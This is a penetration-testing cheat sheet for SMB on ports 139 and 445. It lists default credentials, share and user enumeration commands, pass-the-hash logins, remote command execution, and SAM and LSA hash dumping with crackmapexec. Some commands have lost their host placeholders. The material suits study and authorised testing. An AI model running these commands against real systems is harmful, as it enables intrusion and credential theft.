# 139, 445 - SMB ## Port 139 Port 139 is terferred to a 'NBT over IP'. The Network Basic Input Output System (NETBIOS) is a software product designed to enable objects in a local area network (LAN) to interact with network hardware an facilitate the transmission of data across the network. ## Port 445 Port 445 is identified as 'SMB over IP'. SMB stands for Server Message Blocks, which is also known as Common Internet File System. As an application-layer network protocol, SMB/CIFS is primarily utilized to share files, printers, serial ports, across a network. ## SMB The Server Message Block (SMB) protocol is designed for regulating access to files, directories, and other network resources like printers or routers. Primarily utilized within the Windows operating system, SMB ensures backward compativility. The Samba project offers a free software solution for SMB implementation on Linux and Unix systems. ### IPC$ Share The IPC$ share can be accessed through an anonymous null session, allowing for interacting with services exposed via named pipes. `enum4linux`can be used to collect: * Information on the operating system * Details on the parent domain * compilation of local users and groups * information on available SMB shares * effective system security policy ```bash enum4linux -a target-ip ``` ## Common Credentials (blank) : (blank) guest : (blank) Administrator, admin : (blank), password, administrator, admin arcserve : arcserve, backup tivoli, tmersrvd : tivoli, tmersvd, admin backupexec, backup : backupexec, backup, arcada test, lab, demo : password, test, lab, demo ## List Shares using smbclient ```bash smbclient -L /// ``` ## Enumerate Users, Groups & Logged On Users {% code overflow="wrap" %} ```bash crackmapexec smb 10.10.10.10 --users [-u -p ] crackmapexec smb 10.10.10.10 --groups [-u -p ] crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u -p ] ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " enumdomusers enumdomgroups ``` {% endcode %} ## Enumerate Local Users ### Impacket ```bash lookupsid.py -no-pass hostname.local impacket-lookupsid -no-pass hostname.local ``` ## Shared Folders Enumeration Look if you can access anything that you find. If you don't have credentials, try using null credentials/guest user ### List Shared Folders {% code overflow="wrap" %} ```bash smbclient --no-pass -L // # Null user smbclient -U 'username[%password]' -L [--pw-nt-hash] // # if pwd is omitted, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash smbmap -H [-P ] #Null user smbmap -u "username" -p "password" -H [-P ] #Creds smbmap -u "username" -p ":" -H [-P ] #Pass-the-Hash smbmap -R -u "username" -p "password" -H [-P ] #Recursive list crackmapexec smb -u '' -p '' --shares #Null user crackmapexec smb -u 'username' -p 'password' --shares #Guest user crackmapexec smb -u 'username' -H '' --shares #Guest user ``` {% endcode %} ### Connect/List a Shared Folder {% code overflow="wrap" %} ```bash #Connect using smbclient smbclient --no-pass /// smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash #Use --no-pass -c 'recurse;ls' to list recursively with smbclient #List with smbmap, without folder it list everything smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive list smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash ``` {% endcode %} {% code overflow="wrap" %} ```bash smbclient -U '%' -N \\\\\\ # null session to connect to a windows share smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password) ``` {% endcode %} ### From Windows Host #### Powershell ```powershell # Retrieves SMB shares on local computer Get-SmbShare Get-WmiObject -Class Win32_Share # Retrieves the SMB shares on a remote computer Get-SmbShare -CimSession "" # Retrieves connections established from the local SMB client to the SMB servers. Get-SmbConnection ``` #### CMD ```powershell # List shares on the local computer net share # List shares on a remote computer (including hidden ones) net view \\ /all ``` ## Mount a Share on Linux ```bash mount -t cifs //10.10.10.10/share /mnt/share mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share ``` ## Download files from a share ```sh #Download all smbclient /// > mask "" > recurse > prompt > mget * #Download everything to current directory ``` ## Execute Commands ### crackmapexec crackmapexec can execute commands abusing any of mmcexec, smbexec, atexec, wmiexec being wmiexec the default method. ```bash apt-get install crackmapexec crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd crackmapexec smb 192.168.10.11 -u Administrator -H -x whoami #Pass-the-Hash # Using --exec-method {mmcexec,smbexec,atexec,wmiexec} crackmapexec smb -d -u Administrator -p 'password' --sam #Dump SAM crackmapexec smb -d -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes crackmapexec smb -d -u Administrator -p 'password' --sessions #Get sessions ( crackmapexec smb -d -u Administrator -p 'password' --loggedon-users #Get logged-on users crackmapexec smb -d -u Administrator -p 'password' --disks #Enumerate the disks crackmapexec smb -d -u Administrator -p 'password' --users #Enumerate users crackmapexec smb -d -u Administrator -p 'password' --groups # Enumerate groups crackmapexec smb -d -u Administrator -p 'password' --local-groups # Enumerate local groups crackmapexec smb -d -u Administrator -p 'password' --pass-pol #Get password policy crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RID brute crackmapexec smb -d -u Administrator -H #Pass-The-Hash ```